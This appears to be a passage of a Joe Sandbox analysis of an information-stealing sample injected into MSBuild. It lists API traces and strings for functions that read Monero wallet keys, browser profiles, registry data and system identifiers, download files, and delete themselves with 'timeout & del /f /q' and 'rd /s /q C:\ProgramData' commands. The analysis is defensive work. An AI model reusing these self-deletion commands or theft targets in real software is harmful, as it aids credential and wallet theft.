Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

ExitProcess.KERNEL32 ref: 004013E3

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
String ID:
API String ID: 2891980384-0
Opcode ID: 2857db7161bcc320a30419e20b2b34e424e7c04c5a94567df98be0c40a6a9c3d
Instruction ID: 9778931569992fdfa2ae274a5f191432572d6dba79c88691fb85554d5ade8f97
Opcode Fuzzy Hash: 2857db7161bcc320a30419e20b2b34e424e7c04c5a94567df98be0c40a6a9c3d
Instruction Fuzzy Hash: 9A41A9B2D4422C57DB20EBB19C59FDB7BAC9F18310F5405A3E8D9E3181D67C9A84CB58

Function 00411203 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
wsprintfA.USER32 ref: 004112DD
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
RegCloseKey.ADVAPI32(?), ref: 00411446
RegCloseKey.ADVAPI32(?), ref: 00411466
RegCloseKey.ADVAPI32(?), ref: 00411472

Strings

- , xrefs: 004113E6
%s\%s, xrefs: 004112D7
?, xrefs: 00411263

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
String ID: - $%s\%s$?
API String ID: 2394436309-3278919252
Opcode ID: 3d69115a6f8724683417ca135766935035775c138346bf0c7f6cb84cd66cf9a6
Instruction ID: 4bdd8942e51cb3c4ef1bdab2b95b8e79246b76881c5f67d30fe8b157efa9521a
Opcode Fuzzy Hash: 3d69115a6f8724683417ca135766935035775c138346bf0c7f6cb84cd66cf9a6
Instruction Fuzzy Hash: 8A61F7B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54

Function 00418381 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004183A6
_memset.LIBCMT ref: 004183B5
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004183CA

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

ShellExecuteEx.SHELL32(?), ref: 00418566
_memset.LIBCMT ref: 00418575
_memset.LIBCMT ref: 00418587
ExitProcess.KERNEL32 ref: 00418597

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

" & exit, xrefs: 004184EA
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 004184A0
/c timeout /t 10 & del /f /q ", xrefs: 004183F5
" & rd /s /q "C:\ProgramData\, xrefs: 00418443
" & exit, xrefs: 00418499

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
API String ID: 2823247455-1079830800
Opcode ID: d422a401582e63c5a8ddf1c1e1ebbc82d46f8f2d7e5a69427eac4bc0c7923cf1
Instruction ID: 42d7332e6cc6663f0099cc2e6ad6024dff952061cbeabe4f84512a7cff8bb842
Opcode Fuzzy Hash: d422a401582e63c5a8ddf1c1e1ebbc82d46f8f2d7e5a69427eac4bc0c7923cf1
Instruction Fuzzy Hash: 4F51ACB1D4022A9BCB21EF55CD41ADDB3BCAB44708F4110EAA718B3151DA786FC68E58

Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
wsprintfA.USER32 ref: 00410AA7
lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713

lstrlenA.KERNEL32(?), ref: 00410ACD

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Strings

QuBi, xrefs: 00410A27
0xA, xrefs: 00410B21
:\, xrefs: 00410A06
C, xrefs: 004109DF

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
String ID: 0xA$:\$C$QuBi
API String ID: 1856320939-2474135401
Opcode ID: fe1506f50967b878d8a816889520671eb8f24b5d456e6e545ca51c3c9142c769
Instruction ID: a97db629e7901cba1803c5ad0a4512298f3feb58bff5cd952ebdd5184ea07982
Opcode Fuzzy Hash: fe1506f50967b878d8a816889520671eb8f24b5d456e6e545ca51c3c9142c769
Instruction Fuzzy Hash: A741AFB1A042289BCB249F749D85ADEBBB9EF19304F0000EAF109E3121E6758FD58F54

Function 004067ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
StrCmpCA.SHLWAPI(?), ref: 00406856
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
CloseHandle.KERNEL32(?), ref: 00406923
InternetCloseHandle.WININET(00000000), ref: 0040692A
InternetCloseHandle.WININET(?), ref: 00406936

Strings

<+A, xrefs: 00406954

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: <+A
API String ID: 2507841554-2778417545
Opcode ID: b126a83a8e75cd60647665ee46d5c35e74e88a93df8161cbc9eec9515351366c
Instruction ID: 38e87463d8a567d304acc58f085aeda0b6ea51c0627365b5ff586089dea0ca20
Opcode Fuzzy Hash: b126a83a8e75cd60647665ee46d5c35e74e88a93df8161cbc9eec9515351366c
Instruction Fuzzy Hash: ED411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA8

Function 0040EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40

Strings

firefox, xrefs: 0040EE17
Stable\, xrefs: 0040EB71
Stable\, xrefs: 0040ED5B

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\$firefox
API String ID: 3722407311-2697854757
Opcode ID: 161ecba77e78b84977177c9a2eec29f434eb24eb35194929f651236fe4565c49
Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
Opcode Fuzzy Hash: 161ecba77e78b84977177c9a2eec29f434eb24eb35194929f651236fe4565c49
Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9

Function 00401AB8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401ADC

Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
Part of subcall function 00401A51: RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD

lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
lstrlenA.KERNEL32(?), ref: 00401AFE
lstrcatA.KERNEL32(?,.keys), ref: 00401B19

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

CopyFileA.KERNEL32(?,?,00000001), ref: 00401C2A

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

DeleteFileA.KERNEL32(?), ref: 00401C9D

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

Strings

.keys, xrefs: 00401B0D
\Monero\wallet.keys, xrefs: 00401B2F

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 615783205-3586502688
Opcode ID: e315d58a9e0246034c20351f87248d432db0c5e929893418433aec7ea3ed2e35
Instruction ID: 2364c372bad150323d67af03c4d359b51cc93a95bd900eacfe79e48eddbf336c
Opcode Fuzzy Hash: e315d58a9e0246034c20351f87248d432db0c5e929893418433aec7ea3ed2e35
Instruction Fuzzy Hash: 13515EB1E5011D9BCF11EB25DD466DD7379AF04308F1050BAB60873191DA78AFC98F48

Function 00415DF7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
lstrcatA.KERNEL32(?,?), ref: 00415EC2
lstrcatA.KERNEL32(?,?), ref: 00415ED6
lstrcatA.KERNEL32(?), ref: 00415EE9
lstrcatA.KERNEL32(?,?), ref: 00415EFD
lstrcatA.KERNEL32(?), ref: 00415F10

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9
Part of subcall function 00415B0B: CopyFileA.KERNEL32(?,?,00000001), ref: 00415C86
Part of subcall function 00415B0B: DeleteFileA.KERNEL32(?), ref: 00415CA9

Strings

\{A, xrefs: 00415FC2

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
String ID: \{A
API String ID: 1546541418-1475862525
Opcode ID: d4b2bde86fe4251d1723cf1afd7b1acd461b49a3d9a868b58b9625d100857c79
Instruction ID: 1319a00e3beaa56ad984c577cc8328c236cda2b61ebb5edaa0c38c4a30c6fdde
Opcode Fuzzy Hash: d4b2bde86fe4251d1723cf1afd7b1acd461b49a3d9a868b58b9625d100857c79
Instruction Fuzzy Hash: 1E51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAFA09E3250EA35AB898F58

Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
_memset.LIBCMT ref: 0040FBC1
??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17

Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A

Strings

N0ZWFt, xrefs: 0040FC7E

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: OpenProcess_memmove_memset
String ID: N0ZWFt
API String ID: 2647191932-431618156
Opcode ID: 5f62aa5b6abcaa0ca0cbb89d9b96bb4e1aae85ed0061038e1d2274415a3f45d9
Instruction ID: 446351bc283c4762e53d247ac54b49bb6219315ee7fac77137ec1a6eb046dabb
Opcode Fuzzy Hash: 5f62aa5b6abcaa0ca0cbb89d9b96bb4e1aae85ed0061038e1d2274415a3f45d9
Instruction Fuzzy Hash: 4A5191B1D0022C9FDB309F54DC85BDDB7B8AB44308F0001FAA609B7692D6796E898F59

Function 0041566F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004156A4
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
RegCloseKey.ADVAPI32(?), ref: 004156F6
lstrcatA.KERNEL32(?,?), ref: 00415725
lstrcatA.KERNEL32(?), ref: 00415738

Strings

.{A, xrefs: 004157FE

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

